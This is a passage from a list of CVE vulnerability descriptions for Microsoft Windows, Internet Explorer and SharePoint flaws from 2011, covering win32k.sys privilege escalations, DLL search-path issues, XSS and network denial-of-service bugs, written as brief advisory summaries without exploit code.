"LDAPS Authentication Bypass Vulnerability." [CVE-2011-2013] Integer overflow in the TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code by sending a sequence of crafted UDP packets to a closed port, aka "Reference Counter Overflow Vulnerability." [CVE-2011-2011] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-2009] Untrusted search path vulnerability in Windows Media Center in Microsoft Windows Vista SP2 and Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista, allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Media Center Insecure Library Loading Vulnerability." [CVE-2011-2005] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-2004] Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a crafted TrueType font file, aka "TrueType Font Parsing Vulnerability," a different vulnerability than CVE-2011-3402. [CVE-2011-2003] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability." [CVE-2011-2002] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle TrueType fonts, which allows local users to cause a denial of service (system hang) via a crafted font file, aka "Win32k TrueType Font Type Translation Vulnerability." [CVE-2011-1991] Multiple untrusted search path vulnerabilities in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .rtf, or .txt file, related to (1) deskpan.dll in the Display Panning CPL Extension, (2) EAPHost Authenticator Service, (3) Folder Redirection, (4) HyperTerminal, (5) the Japanese Input Method Editor (IME), and (6) Microsoft Management Console (MMC), aka "Windows Components Insecure Library Loading Vulnerability." [CVE-2011-1985] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1984] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges by sending crafted packets over the loopback interface, aka "WINS Local Elevation of Privilege Vulnerability." [CVE-2011-1975] Untrusted search path vulnerability in the Data Access Tracing component in Windows Data Access Components (Windows DAC) 6.0 in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an Excel .xlsx file, aka "Data Access Components Insecure Library Loading Vulnerability." [CVE-2011-1974] NDISTAPI.sys in the NDISTAPI driver in Remote Access Service (RAS) in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "NDISTAPI Elevation of Privilege Vulnerability." [CVE-2011-1971] The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse file metadata, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Metadata Parsing DOS Vulnerability." [CVE-2011-1970] The DNS server in Microsoft Windows Server 2003 SP2 and Windows Server 2008 SP2, R2, and R2 SP1 does not properly initialize memory, which allows remote attackers to cause a denial of service (service outage) via a query for a nonexistent domain, aka "DNS Uninitialized Memory Corruption Vulnerability." [CVE-2011-1968] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly process packets in memory, which allows remote attackers to cause a denial of service (reboot) by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, as exploited in the wild in 2011, aka "Remote Desktop Protocol Vulnerability." [CVE-2011-1967] Winsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Vulnerability." [CVE-2011-1966] The DNS server in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 does not properly handle NAPTR queries that trigger recursive processing, which allows remote attackers to execute arbitrary code via a crafted query, aka "DNS NAPTR Query Vulnerability." [CVE-2011-1965] Tcpip.sys in the TCP/IP stack in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 does not properly implement URL-based QoS, which allows remote attackers to cause a denial of service (reboot) via a crafted URL to a web server, aka "TCP/IP QOS Denial of Service Vulnerability." [CVE-2011-1894] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for embedded content in an HTML document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted EMBED element in a web page that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-1893] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010, Windows SharePoint Services 2.0 and 3.0 SP2, and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "SharePoint XSS Vulnerability." [CVE-2011-1892] Microsoft Office Groove 2007 SP2, SharePoint Workspace 2010 Gold and SP1, Office Forms Server 2007 SP2, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Office Groove Data Bridge Server 2007 SP2, Office Groove Management Server 2007 SP2, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, and Office Web Apps 2010 Gold and SP1 do not properly handle Web Parts containing XML classes referencing external entities, which allows remote authenticated users to read arbitrary files via a crafted XML and XSL file, aka "SharePoint Remote File Disclosure Vulnerability." [CVE-2011-1891] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in a request to a script, aka "Contact Details Reflected XSS Vulnerability." [CVE-2011-1888] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1887] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1886] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 does not properly validate the arguments to functions, which allows local users to read arbitrary data from kernel memory via a crafted application that triggers a NULL pointer dereference, aka "Win32k Incorrect Parameter Validation Allows Information Disclosure Vulnerability." [CVE-2011-1885] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1884] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1883] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1882] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1881] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1880] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1879] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1878] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1877] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-1876] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1875] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1874] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1873] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate pointers during the parsing of OpenType (aka OTF) fonts, which allows remote attackers to execute arbitrary code via a crafted font file, aka "Win32k OTF Validation Vulnerability." [CVE-2011-1872] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, R2, and R2 SP1 allows guest OS users to cause a denial of service (host OS infinite loop) via malformed machine instructions in a VMBus packet, aka "VMBus Persistent DoS Vulnerability." [CVE-2011-1871] Tcpip.sys in the TCP/IP stack in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a series of crafted ICMP messages, aka "ICMP Denial of Service Vulnerability." [CVE-2011-1870] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutputString Vulnerability." [CVE-2011-1869] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote DFS servers to cause a denial of service (system hang) via a crafted referral response, aka "DFS Referral Response Vulnerability." [CVE-2011-1868] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate fields in DFS responses, which allows remote DFS servers to execute arbitrary code via a crafted response, aka "DFS Memory Corruption Vulnerability." [CVE-2011-1713] Microsoft msxml.dll, as used in Internet Explorer 8 on Windows 7, allows remote attackers to obtain potentially sensitive information about heap memory addresses via an XML document containing a call to the XSLT generate-id XPath function. NOTE: this might overlap CVE-2011-1202. [CVE-2011-1652] DISPUTED The default configuration of Microsoft Windows 7 immediately prefers a new IPv6 and DHCPv6 service over a currently used IPv4 and DHCPv4 service upon receipt of an IPv6 Router Advertisement (RA), and does not provide an option to ignore an unexpected RA, which allows remote attackers to conduct man-in-the-middle attacks on communication with external IPv4 servers via vectors involving RAs, a DHCPv6 server, and NAT-PT on the local network, aka a "SLAAC Attack." NOTE: it can be argued that preferring IPv6 complies with RFC 3484, and that attempting to determine the legitimacy of an RA is currently outside the scope of recommended behavior of host operating systems. [CVE-2011-1347] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to bypass Protected Mode and create arbitrary files by leveraging access to a Low integrity process, as demonstrated by Stephen Fewer as the third of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1346] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Stephen Fewer as the second of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1284] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutput Vulnerability." [CVE-2011-1283] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 does not ensure that an unspecified array index has a non-negative value before performing read and write operations, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleNumberOfCommand Vulnerability." [CVE-2011-1282] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly initialize memory and consequently uses a NULL pointer in an unspecified function call, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleLocalEUDC Vulnerability." [CVE-2011-1281] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly restrict the number of console objects for a process, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP AllocConsole Vulnerability." [CVE-2011-1268] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Response Parsing Vulnerability." [CVE-2011-1267] The SMB server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 request, aka "SMB Request Parsing Vulnerability." [CVE-2011-1265] The Bluetooth Stack 2.1 in Microsoft Windows Vista SP1 and SP2 and Windows 7 Gold and SP1 does not prevent access to objects in memory that (1) were not properly initialized or (2) have been deleted, which allows remote attackers to execute arbitrary code via crafted Bluetooth packets, aka "Bluetooth Stack Vulnerability." [CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability." [CVE-2011-1263] Cross-site scripting (XSS) vulnerability in the logon page in Remote Desktop Web Access (RD Web Access) in Microsoft Windows Server 2008 R2 and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "Remote Desktop Web Access Vulnerability." [CVE-2011-1252] Cross-site scripting (XSS) vulnerability in the SafeHTML function in the toStaticHTML API in Microsoft Internet Explorer 7 and 8, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified strings, aka "toStaticHTML Information Disclosure Vulnerability" or "HTML Sanitization Vulnerability." [CVE-2011-1249] The Ancillary Function Driver (AFD) in afd.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-1248] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 does not properly handle socket send exceptions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted packets, related to unintended stack-frame values and buffer passing, aka "WINS Service Failed Response Vulnerability." [CVE-2011-1247] Untrusted search path vulnerability in the Microsoft Active Accessibility component in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Active Accessibility Insecure Library Loading Vulnerability." [CVE-2011-1243] The Windows Messenger ActiveX control in msgsc.dll in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via unspecified vectors that "corrupt the system state," aka "Microsoft Windows Messenger ActiveX Control Vulnerability." [CVE-2011-1242] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1241] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1240] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1239] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1238] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1237] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1236] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1235] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1234] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1233] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1232] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1231] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1230] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1229] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1228] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1227] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1226] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1225] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1068] Microsoft Windows Azure Software Development Kit (SDK) 1.3.x before 1.3.20121.1237, when Full IIS and a Web Role are used with an ASP.NET application, does not properly support the use of cookies for maintaining state, which allows remote attackers to obtain potentially sensitive information by reading an encrypted cookie and performing unspecified other steps. [CVE-2011-0677] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0676] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0675] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect 